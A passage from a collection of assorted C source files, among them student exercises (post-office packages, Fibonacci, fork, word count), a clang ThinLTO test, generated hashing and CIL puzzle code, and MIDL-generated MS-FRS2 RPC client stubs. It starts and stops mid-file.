*/ return NULL; } /* Iterate through towns. */ for (int t = 0; t < towns_count; t++) { /* Check if town's name matches. */ if (strcmp(towns[t].name, name) == 0) { /* Return pointer to current town. */ return &towns[t]; } } /* Town not found. */ return NULL; } void freeTowns(town* towns) { /* Iterate through towns. */ for (int t = 0; t < towns_count; t++) { /* Iterate through town's post offices. */ for (int o = 0; o < towns[t].offices_count; o++) { /* Iterate through office's packages. */ for (int p = 0; p < towns[t].offices[o].packages_count; p++) { /* Free package id. */ free(towns[t].offices[o].packages[p].id); } /* Free packages. */ free(towns[t].offices[o].packages); } /* Free offices. */ free(towns[t].offices); /* Free town's name. */ free(towns[t].name); } /* Free towns. */ free(towns); } int main() { scanf("%d", &towns_count); towns = malloc(sizeof(town)*towns_count); for (int i = 0; i < towns_count; i++) { towns[i].name = malloc(sizeof(char) * MAX_STRING_LENGTH); scanf("%s", towns[i].name); scanf("%d", &towns[i].offices_count); towns[i].offices = malloc(sizeof(post_office)*towns[i].offices_count); for (int j = 0; j < towns[i].offices_count; j++) { scanf("%d%d%d", &towns[i].offices[j].packages_count, &towns[i].offices[j].min_weight, &towns[i].offices[j].max_weight); towns[i].offices[j].packages = malloc(sizeof(package)*towns[i].offices[j].packages_count); for (int k = 0; k < towns[i].offices[j].packages_count; k++) { towns[i].offices[j].packages[k].id = malloc(sizeof(char) * MAX_STRING_LENGTH); scanf("%s", towns[i].offices[j].packages[k].id); scanf("%d", &towns[i].offices[j].packages[k].weight); } } } int queries; scanf("%d", &queries); char town_name[MAX_STRING_LENGTH]; while (queries--) { int type; scanf("%d", &type); switch (type) { case 1: scanf("%s", town_name); town* t = find_town(towns, towns_count, town_name); print_all_packages(*t); break; case 2: scanf("%s", town_name); town* source = find_town(towns, towns_count, town_name); int source_index; scanf("%d", &source_index); scanf("%s", town_name); town* target = find_town(towns, towns_count, town_name); int target_index; scanf("%d", &target_index); send_all_acceptable_packages(source, source_index, target, target_index); break; case 3: printf("Town with the most number of packages is %s\n", town_with_most_packages(towns, towns_count).name); break; } } /* Cleanup. */ freeTowns(towns); return 0; }
the_stack_data/1136579.c
// REQUIRES: x86-registered-target // RUN: %clang_cc1 -debug-info-kind=limited -triple x86_64-unknown-linux-gnu \ // RUN: -flto=thin -emit-llvm-bc \ // RUN: -o %t.o %s // RUN: llvm-lto2 run -thinlto-distributed-indexes %t.o \ // RUN: -o %t2.index \ // RUN: -r=%t.o,main,px // RUN: %clang_cc1 -triple x86_64-unknown-linux-gnu \ // RUN: -emit-obj -fthinlto-index=%t.o.thinlto.bc \ // RUN: -o %t.native.o -split-dwarf-file %t.native.dwo -x ir %t.o // RUN: llvm-readobj -sections %t.native.o | FileCheck --check-prefix=O %s // RUN: llvm-readobj -sections %t.native.dwo | FileCheck --check-prefix=DWO %s // O-NOT: .dwo // DWO: .dwo int main() {}
the_stack_data/111077056.c
#include <stdlib.h> /* The call atoul(str) shall be equivalent to: strtoul(str, (char **)NULL, 10) except that the handling of errors may differ. If the value cannot be represented, the behavior is undefined. The atoul() function shall return the converted value if the value can be represented. */ // this can be handy on some low end MCUs // without hw multiplier #if defined(LIBC_ATOI_USE_SHIFT_ADD) #define MULBY10(n) (((n) + ((n) << 2)) << 1) #else #define MULBY10(n) ((n) * 10) #endif // LIBC_ATOI_USE_SHIFT_ADD // heavily modified musl atoi code unsigned long atoul(const char *s) { unsigned long n = 0; unsigned char c; // strip leading whitespace while(1) { c = (unsigned char) *s++ - '0'; if(c <= 9) break; // test for end of string if(c == (unsigned char)(-'0')) return 0; } // first digit is in c n = c; /* Compute n */ while(1) { c = (unsigned char) *s++ - '0'; if(c > 9) break; n = MULBY10(n) + c; } return n; }
the_stack_data/87119.c
#include <stdio.h> int st, nd; int fibonacci(int n) { if (n == 0) { st++; return 0; } else if (n == 1) { nd++; return 1; } else { return fibonacci(n-1) + fibonacci(n-2); } } int main() { int num; scanf("%d",&num); for(int i=0;i<num;i++) { st=0; nd=0; int tmp; scanf("%d",&tmp); fibonacci(tmp); printf("%d %d\n",st,nd); } return 0; } //시간 초과 현상이 일어남
the_stack_data/149520.c
/* 1я часть * Написать программу, запускающую новый процесс системным вызовом * fork(). ‚ предке вывести собственный идентификатор ( функция * getpid()), идентификатор группы ( функция getpgrp()) и * идентификатор потомка. ‚ процессе-потомке вывести собственный * идентификатор, идентификатор предка ( функция getppid()) и * идентификатор группы. убедиться, что при завершении процесса-предка * потомок получает идентификатор предка (PPID), равный 1. */ #include <stdio.h> //printf #include <stdlib.h> //exit int main() { int child = fork(); if ( child == -1 ) { perror("couldn't fork."); exit(1); } if ( child == 0 ) { //потомственный код sleep(1); printf( "Child: pid=%d; group=%d; parent=%d\n", getpid(), getpgrp(), getppid() ); return 0; } int child2 = fork(); if ( child2 == -1 ) { perror("couldn't fork."); exit(1); } if ( child2 == 0 ) { //потомственный код 2 sleep(1); printf( "Child2: pid=%d; group=%d; parent=%d\n", getpid(), getpgrp(), getppid() ); return 0; } else { //родительский код obshiy printf( "Parent: pid=%d; group=%d; child=%d; child2=%d\n", getpid(), getpgrp(), child, child2 ); return 0; } }
the_stack_data/41091.c
/* Comando 'caso' com impressao Helena Caseli 2010 */ #include <stdio.h> #include <stdlib.h> int main() { switch (2) { case 0: case 1: printf("ERRO"); break; case 2: printf("OK"); break; case 3: case 4: case 5: case 6: case 7: case 8: case 9: case 10: case 11: case 12: case 13: case 14: case 15: case 16: case 17: case 18: case 19: case 20: case 21: case 22: case 23: case 24: case 25: case 26: case 27: case 28: case 29: case 30: case 31: case 32: case 33: case 34: case 35: case 36: case 37: case 38: case 39: case 40: case 41: case 42: case 43: case 44: case 45: case 46: case 47: case 48: case 49: case 50: case 51: case 52: case 53: case 54: case 55: case 56: case 57: case 58: case 59: case 60: case 61: case 62: case 63: case 64: case 65: case 66: case 67: case 68: case 69: case 70: case 71: case 72: case 73: case 74: case 75: case 76: case 77: case 78: case 79: case 80: case 81: case 82: case 83: case 84: case 85: case 86: case 87: case 88: case 89: case 90: case 91: case 92: case 93: case 94: case 95: case 96: case 97: case 98: case 99: case 100: printf("ERRO"); break; default: printf("ERRO"); } return 0; }
the_stack_data/165765572.c
#include <stdint.h> unsigned int feld_rotl(const unsigned int value, int shift) { if ((shift &= sizeof(value) * 8 - 1) == 0) return value; return value << shift | value >> sizeof(value) * 8 - shift; } int main() { uint8_t _a0[] = {84, 104, 101, 32, 113, 117, 105, 99, 107, 32, 98, 114, 111, 119, 110, 32, 102, 111, 120, 32, 106, 117, 109, 112, 115, 32, 111, 118, 101, 114, 32, 116, 104, 101, 32, 108, 97, 122, 121, 32, 100, 111, 103}; uint8_t *a0 = _a0; uint64_t r1; uint8_t r2; uint8_t v4; uint8_t v5; uint8_t v6; uint8_t r7; uint8_t v9; uint8_t v13; uint32_t r16; uint32_t r17; uint32_t r18; uint32_t r19; uint32_t r20; uint8_t r21; uint8_t v22; uint8_t _a36[20]; uint8_t *a36 = _a36; uint8_t v37; uint8_t v38; uint8_t v39; uint8_t v40; uint8_t v41; r1 = (uint64_t) 43 * 8; r2 = 64 * (1 + 43 / 64); uint8_t _a3[r2]; uint8_t *a3 = _a3; for (v4 = 0; v4 <= 43 - 1; v4++) { a3[v4 + 0] = a0[v4 + 0]; } a3[43 + 0] = 1; for (v5 = 43 + 1; v5 <= r2 - 9; v5++) { a3[v5 + 0] = 0; } for (v6 = r2 - 8; v6 <= r2 - 1; v6++) { a3[v6 + 0] = (uint8_t) (r1 >> 8 * (r2 - 1 - v6)); } r7 = r2 / 64; uint32_t _a8[80 * r7]; uint32_t *a8 = _a8; for (v9 = 0; v9 <= r7 - 1; v9++) { uint8_t r10; uint8_t r11; uint8_t v12; r10 = v9 * 16; r11 = v9 * 80; for (v12 = 0; v12 <= 15; v12++) { a8[v9 + v12 + 0] = (uint32_t) a3[r10 + v12 * 4 + 0] + ((uint32_t) a3[r10 + v12 * 4 + 1 + 0] << 8) + ((uint32_t) a3[r10 + v12 * 4 + 2 + 0] << 16) + ((uint32_t) a3[r10 + v12 * 4 + 3 + 0] << 24); } } for (v13 = 0; v13 <= r7 - 1; v13++) { uint8_t r14; uint8_t v15; r14 = v13 * 80; for (v15 = r14 + 16; v15 <= r14 + 79; v15++) { a8[v15 + 0] = feld_rotl(((a8[v15 - 3 + 0] ^ a8[v15 - 8 + 0]) ^ a8[v15 - 14 + 0]) ^ a8[v15 - 16 + 0], 1); } } r16 = 1732584193; r17 = 4023233417; r18 = 2562383102; r19 = 271733878; r20 = 3285377520; r21 = 80 * r7 / 80; for (v22 = 0; v22 <= r21 - 1; v22++) { uint32_t r23; uint32_t r24; uint32_t r25; uint32_t r26; uint32_t r27; uint8_t v28; r23 = r16; r24 = r17; r25 = r18; r26 = r19; r27 = r20; for (v28 = 0; v28 <= 79; v28++) { uint32_t b29; uint32_t b32; uint32_t r35; if (0 <= v28 && v28 <= 19) { b29 = (r24 & r25) | (~r24 & r26); } else { uint32_t b30; if (20 <= v28 && v28 <= 39) { b30 = (r24 ^ r25) ^ r26; } else { uint32_t b31; if (40 <= v28 && v28 <= 59) { b31 = (r24 & r25) | (r24 & r26) | (r25 & r26); } else { b31 = (r24 ^ r25) ^ r26; } b30 = b31; } b29 = b30; } if (0 <= v28 && v28 <= 19) { b32 = 1518500249; } else { uint32_t b33; if (20 <= v28 && v28 <= 39) { b33 = 1859775393; } else { uint32_t b34; if (40 <= v28 && v28 <= 59) { b34 = 2400959708; } else { b34 = 3395469782; } b33 = b34; } b32 = b33; } r35 = feld_rotl(r23, 5) + b29 + r27 + a8[v28 + 0] + b32; r27 = r26; r26 = r25; r25 = feld_rotl(r24, 30); r24 = r23; r23 = r35; } r16 = r16 + r23; r17 = r17 + r24; r18 = r18 + r25; r19 = r19 + r26; r20 = r20 + r27; } for (v37 = 0; v37 <= 3; v37++) { a36[v37 + 0] = (uint8_t) (r16 >> 8 * (3 - (uint32_t) v37)); } for (v38 = 0; v38 <= 3; v38++) { a36[v38 + 4 + 0] = (uint8_t) (r17 >> 8 * (3 - (uint32_t) v38)); } for (v39 = 0; v39 <= 3; v39++) { a36[v39 + 8 + 0] = (uint8_t) (r18 >> 8 * (3 - (uint32_t) v39)); } for (v40 = 0; v40 <= 3; v40++) { a36[v40 + 12 + 0] = (uint8_t) (r19 >> 8 * (3 - (uint32_t) v40)); } for (v41 = 0; v41 <= 3; v41++) { a36[v41 + 16 + 0] = (uint8_t) (r20 >> 8 * (3 - (uint32_t) v41)); } return 0; }
the_stack_data/40319.c
/* Exercise 1-11. How would you test the word count program? What kinds of input are most likely to uncover bugs if there are any ? */ #include <stdio.h> #define IN 1 /* inside a word */ #define OUT 0 /* outside a word */ /* count lines, words, and characters in input */ int main() { int c, nl, nw, nc, state; state = OUT; nl = nw = nc = 0; while ((c = getchar()) != EOF) { ++nc; if (c == '\n') ++nl; if ((c == ' ') || (c == '\n') || (c == '\t')) /* (c = '\t') is changed to (c == '\t') to solve the bug. */ state = OUT; else if (state == OUT) { state = IN; ++nw; } } printf("%d %d %d\n", nl, nw, nc); return 0; }
the_stack_data/14199954.c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_isascii.c :+: :+: :+: */ /* +:+ +:+ +:+ */ /* By: rblondia <[email protected]> +#+ +:+ +#+ */ /* +#+#+#+#+#+ +#+ */ /* Created: 2021/11/02 13:50:43 by rblondia #+# #+# */ /* Updated: 2022/01/29 16:57:16 by rblondia ### ########.fr */ /* */ /* ************************************************************************** */ int ft_isascii(int c) { return (c >= 0 && c <= 127); }
the_stack_data/106824.c
/* Generated by CIL v. 1.7.0 */ /* print_CIL_Input is false */ struct _IO_FILE; struct timeval; extern float strtof(char const *str , char const *endptr ) ; extern void signal(int sig , void *func ) ; typedef struct _IO_FILE FILE; extern int atoi(char const *s ) ; extern double strtod(char const *str , char const *endptr ) ; extern int fclose(void *stream ) ; extern void *fopen(char const *filename , char const *mode ) ; extern void abort() ; extern void exit(int status ) ; extern int raise(int sig ) ; extern int fprintf(struct _IO_FILE *stream , char const *format , ...) ; extern int strcmp(char const *a , char const *b ) ; extern int rand() ; extern unsigned long strtoul(char const *str , char const *endptr , int base ) ; void RandomFunc(unsigned long input[1] , unsigned long output[1] ) ; extern int strncmp(char const *s1 , char const *s2 , unsigned long maxlen ) ; extern int gettimeofday(struct timeval *tv , void *tz , ...) ; extern int printf(char const *format , ...) ; int main(int argc , char *argv[] ) ; void megaInit(void) ; extern unsigned long strlen(char const *s ) ; extern long strtol(char const *str , char const *endptr , int base ) ; extern unsigned long strnlen(char const *s , unsigned long maxlen ) ; extern void *memcpy(void *s1 , void const *s2 , unsigned long size ) ; struct timeval { long tv_sec ; long tv_usec ; }; extern void *malloc(unsigned long size ) ; extern int scanf(char const *format , ...) ; void megaInit(void) { { } } int main(int argc , char *argv[] ) { unsigned long input[1] ; unsigned long output[1] ; int randomFuns_i5 ; unsigned long randomFuns_value6 ; int randomFuns_main_i7 ; { megaInit(); if (argc != 2) { printf("Call this program with %i arguments\n", 1); exit(-1); } else { } randomFuns_i5 = 0; while (randomFuns_i5 < 1) { randomFuns_value6 = strtoul(argv[randomFuns_i5 + 1], 0, 10); input[randomFuns_i5] = randomFuns_value6; randomFuns_i5 ++; } RandomFunc(input, output); if (output[0] == 4242424242UL) { printf("You win!\n"); } else { } randomFuns_main_i7 = 0; while (randomFuns_main_i7 < 1) { printf("%lu\n", output[randomFuns_main_i7]); randomFuns_main_i7 ++; } } } void RandomFunc(unsigned long input[1] , unsigned long output[1] ) { unsigned long state[1] ; unsigned long local1 ; { state[0UL] = (input[0UL] + 914778474UL) - 981234615UL; local1 = 0UL; while (local1 < input[1UL]) { state[0UL] = state[local1] + state[0UL]; local1 ++; } output[0UL] = (state[0UL] - 238420169UL) + 818149947UL; } }
the_stack_data/86291.c
// Copyright (c) Microsoft. All rights reserved. // Licensed under the MIT license. See LICENSE file in the project root for full license information. /* this ALWAYS GENERATED file contains the RPC client stubs */ /* File created by MIDL compiler version 8.00.0595 */ /* at Thu Mar 19 14:51:41 2015 */ /* Compiler settings for ms-frs2.idl: Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0595 protocol : dce , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: __declspec(uuid()), __declspec(selectany), __declspec(novtable) DECLSPEC_UUID(), MIDL_INTERFACE() */ /* @@MIDL_FILE_HEADING( ) */ #if defined(_M_AMD64) #pragma warning( disable: 4049 ) /* more than 64k source lines */ #if _MSC_VER >= 1200 #pragma warning(push) #endif #pragma warning( disable: 4211 ) /* redefine extern to static */ #pragma warning( disable: 4232 ) /* dllimport identity*/ #pragma warning( disable: 4024 ) /* array to pointer mapping*/ #include <string.h> #include "ms-frs2.h" #define TYPE_FORMAT_STRING_SIZE 841 #define PROC_FORMAT_STRING_SIZE 1125 #define EXPR_FORMAT_STRING_SIZE 1 #define TRANSMIT_AS_TABLE_SIZE 0 #define WIRE_MARSHAL_TABLE_SIZE 0 typedef struct _ms2Dfrs2_MIDL_TYPE_FORMAT_STRING { short Pad; unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; } ms2Dfrs2_MIDL_TYPE_FORMAT_STRING; typedef struct _ms2Dfrs2_MIDL_PROC_FORMAT_STRING { short Pad; unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; } ms2Dfrs2_MIDL_PROC_FORMAT_STRING; typedef struct _ms2Dfrs2_MIDL_EXPR_FORMAT_STRING { long Pad; unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; } ms2Dfrs2_MIDL_EXPR_FORMAT_STRING; static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; extern const ms2Dfrs2_MIDL_TYPE_FORMAT_STRING ms2Dfrs2__MIDL_TypeFormatString; extern const ms2Dfrs2_MIDL_PROC_FORMAT_STRING ms2Dfrs2__MIDL_ProcFormatString; extern const ms2Dfrs2_MIDL_EXPR_FORMAT_STRING ms2Dfrs2__MIDL_ExprFormatString; #define GENERIC_BINDING_TABLE_SIZE 0 /* Standard interface: __MIDL_itf_ms2Dfrs2_0000_0000, ver. 0.0, GUID={0x00000000,0x0000,0x0000,{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}} */ /* Standard interface: FrsTransport, ver. 1.0, GUID={0x897e2e5f,0x93f3,0x4376,{0x9c,0x9c,0xfd,0x22,0x77,0x49,0x5c,0x27}} */ static const RPC_CLIENT_INTERFACE FrsTransport___RpcClientInterface = { sizeof(RPC_CLIENT_INTERFACE), {{0x897e2e5f,0x93f3,0x4376,{0x9c,0x9c,0xfd,0x22,0x77,0x49,0x5c,0x27}},{1,0}}, {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 0, 0, 0, 0, 0, 0x00000001 }; RPC_IF_HANDLE FrsTransport_v1_0_c_ifspec = (RPC_IF_HANDLE)& FrsTransport___RpcClientInterface; extern const MIDL_STUB_DESC FrsTransport_StubDesc; static RPC_BINDING_HANDLE FrsTransport__MIDL_AutoBindHandle; DWORD CheckConnectivity( /* [in] */ handle_t IDL_handle, /* [in] */ FRS_REPLICA_SET_ID replicaSetId, /* [in] */ FRS_CONNECTION_ID connectionId) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[0], IDL_handle, replicaSetId, connectionId); return ( DWORD )_RetVal.Simple; } DWORD EstablishConnection( /* [in] */ handle_t IDL_handle, /* [in] */ FRS_REPLICA_SET_ID replicaSetId, /* [in] */ FRS_CONNECTION_ID connectionId, /* [in] */ DWORD downstreamProtocolVersion, /* [in] */ DWORD downstreamFlags, /* [out] */ DWORD *upstreamProtocolVersion, /* [out] */ DWORD *upstreamFlags) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[48], IDL_handle, replicaSetId, connectionId, downstreamProtocolVersion, downstreamFlags, upstreamProtocolVersion, upstreamFlags); return ( DWORD )_RetVal.Simple; } DWORD EstablishSession( /* [in] */ handle_t IDL_handle, /* [in] */ FRS_CONNECTION_ID connectionId, /* [in] */ FRS_CONTENT_SET_ID contentSetId) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[120], IDL_handle, connectionId, contentSetId); return ( DWORD )_RetVal.Simple; } /* [async] */ void RequestUpdates( /* [in] */ PRPC_ASYNC_STATE RequestUpdates_AsyncHandle, /* [in] */ handle_t IDL_handle, /* [in] */ FRS_CONNECTION_ID connectionId, /* [in] */ FRS_CONTENT_SET_ID contentSetId, /* [range][in] */ DWORD creditsAvailable, /* [range][in] */ long hashRequested, /* [range][in] */ UPDATE_REQUEST_TYPE updateRequestType, /* [in] */ unsigned long versionVectorDiffCount, /* [size_is][in] */ FRS_VERSION_VECTOR *versionVectorDiff, /* [length_is][size_is][out] */ FRS_UPDATE *frsUpdate, /* [out] */ DWORD *updateCount, /* [out] */ UPDATE_STATUS *updateStatus, /* [out] */ GUID *gvsnDbGuid, /* [out] */ DWORDLONG *gvsnVersion) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[168], RequestUpdates_AsyncHandle, IDL_handle, connectionId, contentSetId, creditsAvailable, hashRequested, updateRequestType, versionVectorDiffCount, versionVectorDiff, frsUpdate, updateCount, updateStatus, gvsnDbGuid, gvsnVersion); } /* [async] */ void RequestVersionVector( /* [in] */ PRPC_ASYNC_STATE RequestVersionVector_AsyncHandle, /* [in] */ handle_t IDL_handle, /* [in] */ DWORD sequenceNumber, /* [in] */ FRS_CONNECTION_ID connectionId, /* [in] */ FRS_CONTENT_SET_ID contentSetId, /* [range][in] */ VERSION_REQUEST_TYPE requestType, /* [range][in] */ VERSION_CHANGE_TYPE changeType, /* [in] */ ULONGLONG vvGeneration) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[276], RequestVersionVector_AsyncHandle, IDL_handle, sequenceNumber, connectionId, contentSetId, requestType, changeType, vvGeneration); } /* [async] */ void AsyncPoll( /* [in] */ PRPC_ASYNC_STATE AsyncPoll_AsyncHandle, /* [in] */ handle_t IDL_handle, /* [in] */ FRS_CONNECTION_ID connectionId, /* [out] */ FRS_ASYNC_RESPONSE_CONTEXT *response) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[348], AsyncPoll_AsyncHandle, IDL_handle, connectionId, response); } /* [async] */ void RequestRecords( /* [in] */ PRPC_ASYNC_STATE RequestRecords_AsyncHandle, /* [in] */ handle_t IDL_handle, /* [in] */ FRS_CONNECTION_ID connectionId, /* [in] */ FRS_CONTENT_SET_ID contentSetId, /* [in] */ FRS_DATABASE_ID uidDbGuid, /* [in] */ DWORDLONG uidVersion, /* [out][in] */ DWORD *maxRecords, /* [out] */ DWORD *numRecords, /* [out] */ DWORD *numBytes, /* [size_is][size_is][out] */ byte **compressedRecords, /* [out] */ RECORDS_STATUS *recordsStatus) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[396], RequestRecords_AsyncHandle, IDL_handle, connectionId, contentSetId, uidDbGuid, uidVersion, maxRecords, numRecords, numBytes, compressedRecords, recordsStatus); } DWORD UpdateCancel( /* [in] */ handle_t IDL_handle, /* [in] */ FRS_CONNECTION_ID connectionId, /* [in] */ FRS_UPDATE_CANCEL_DATA cancelData) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[486], IDL_handle, connectionId, cancelData); return ( DWORD )_RetVal.Simple; } DWORD RawGetFileData( /* [out][in] */ PFRS_SERVER_CONTEXT *serverContext, /* [length_is][size_is][out] */ byte *dataBuffer, /* [range][in] */ DWORD bufferSize, /* [out] */ DWORD *sizeRead, /* [out] */ long *isEndOfFile) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[534], serverContext, dataBuffer, bufferSize, sizeRead, isEndOfFile); return ( DWORD )_RetVal.Simple; } DWORD RdcGetSignatures( /* [in] */ PFRS_SERVER_CONTEXT serverContext, /* [range][in] */ byte level, /* [in] */ DWORDLONG offset, /* [length_is][size_is][out] */ byte *buffer, /* [range][in] */ DWORD length, /* [out] */ DWORD *sizeRead) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[602], serverContext, level, offset, buffer, length, sizeRead); return ( DWORD )_RetVal.Simple; } DWORD RdcPushSourceNeeds( /* [in] */ PFRS_SERVER_CONTEXT serverContext, /* [size_is][in] */ FRS_RDC_SOURCE_NEED *sourceNeeds, /* [range][in] */ DWORD needCount) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[676], serverContext, sourceNeeds, needCount); return ( DWORD )_RetVal.Simple; } DWORD RdcGetFileData( /* [in] */ PFRS_SERVER_CONTEXT serverContext, /* [length_is][size_is][out] */ byte *dataBuffer, /* [range][in] */ DWORD bufferSize, /* [out] */ DWORD *sizeReturned) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[732], serverContext, dataBuffer, bufferSize, sizeReturned); return ( DWORD )_RetVal.Simple; } DWORD RdcClose( /* [out][in] */ PFRS_SERVER_CONTEXT *serverContext) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[794], serverContext); return ( DWORD )_RetVal.Simple; } /* [async] */ void InitializeFileTransferAsync( /* [in] */ PRPC_ASYNC_STATE InitializeFileTransferAsync_AsyncHandle, /* [in] */ handle_t IDL_handle, /* [in] */ FRS_CONNECTION_ID connectionId, /* [out][in] */ FRS_UPDATE *frsUpdate, /* [range][in] */ long rdcDesired, /* [out][in] */ FRS_REQUESTED_STAGING_POLICY *stagingPolicy, /* [out] */ PFRS_SERVER_CONTEXT *serverContext, /* [out] */ FRS_RDC_FILEINFO **rdcFileInfo, /* [length_is][size_is][out] */ byte *dataBuffer, /* [range][in] */ DWORD bufferSize, /* [out] */ DWORD *sizeRead, /* [out] */ long *isEndOfFile) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[838], InitializeFileTransferAsync_AsyncHandle, IDL_handle, connectionId, frsUpdate, rdcDesired, stagingPolicy, serverContext, rdcFileInfo, dataBuffer, bufferSize, sizeRead, isEndOfFile); } DWORD InitializeFileDataTransfer( /* [in] */ handle_t IDL_handle, /* [in] */ FRS_CONNECTION_ID connectionId, /* [out][in] */ FRS_UPDATE *frsUpdate, /* [out] */ PFRS_SERVER_CONTEXT *serverContext, /* [in] */ DWORDLONG offset, /* [in] */ DWORDLONG length, /* [length_is][size_is][out] */ byte *dataBuffer, /* [range][in] */ DWORD bufferSize, /* [out] */ DWORD *sizeRead, /* [out] */ long *isEndOfFile) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[934], IDL_handle, connectionId, frsUpdate, serverContext, offset, length, dataBuffer, bufferSize, sizeRead, isEndOfFile); return ( DWORD )_RetVal.Simple; } /* [async] */ void RawGetFileDataAsync( /* [in] */ PRPC_ASYNC_STATE RawGetFileDataAsync_AsyncHandle, /* [in] */ PFRS_SERVER_CONTEXT serverContext, /* [out] */ ASYNC_BYTE_PIPE *bytePipe) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[1024], RawGetFileDataAsync_AsyncHandle, serverContext, bytePipe); } /* [async] */ void RdcGetFileDataAsync( /* [in] */ PRPC_ASYNC_STATE RdcGetFileDataAsync_AsyncHandle, /* [in] */ PFRS_SERVER_CONTEXT serverContext, /* [out] */ ASYNC_BYTE_PIPE *bytePipe) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&FrsTransport_StubDesc, (PFORMAT_STRING) &ms2Dfrs2__MIDL_ProcFormatString.Format[1074], RdcGetFileDataAsync_AsyncHandle, serverContext, bytePipe); } #if !defined(__RPC_WIN64__) #error Invalid build platform for this stub. #endif static const ms2Dfrs2_MIDL_PROC_FORMAT_STRING ms2Dfrs2__MIDL_ProcFormatString = { 0, { /* Procedure CheckConnectivity */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 2 */ NdrFcLong( 0x0 ), /* 0 */ /* 6 */ NdrFcShort( 0x0 ), /* 0 */ /* 8 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 14 */ NdrFcShort( 0x88 ), /* 136 */ /* 16 */ NdrFcShort( 0x8 ), /* 8 */ /* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */ 0x3, /* 3 */ /* 20 */ 0xa, /* 10 */ 0x81, /* Ext Flags: new corr desc, has big amd64 byval param */ /* 22 */ NdrFcShort( 0x0 ), /* 0 */ /* 24 */ NdrFcShort( 0x0 ), /* 0 */ /* 26 */ NdrFcShort( 0x0 ), /* 0 */ /* 28 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 30 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 34 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter replicaSetId */ /* 36 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 40 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 42 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 46 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure EstablishConnection */ /* Return value */ /* 48 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 50 */ NdrFcLong( 0x0 ), /* 0 */ /* 54 */ 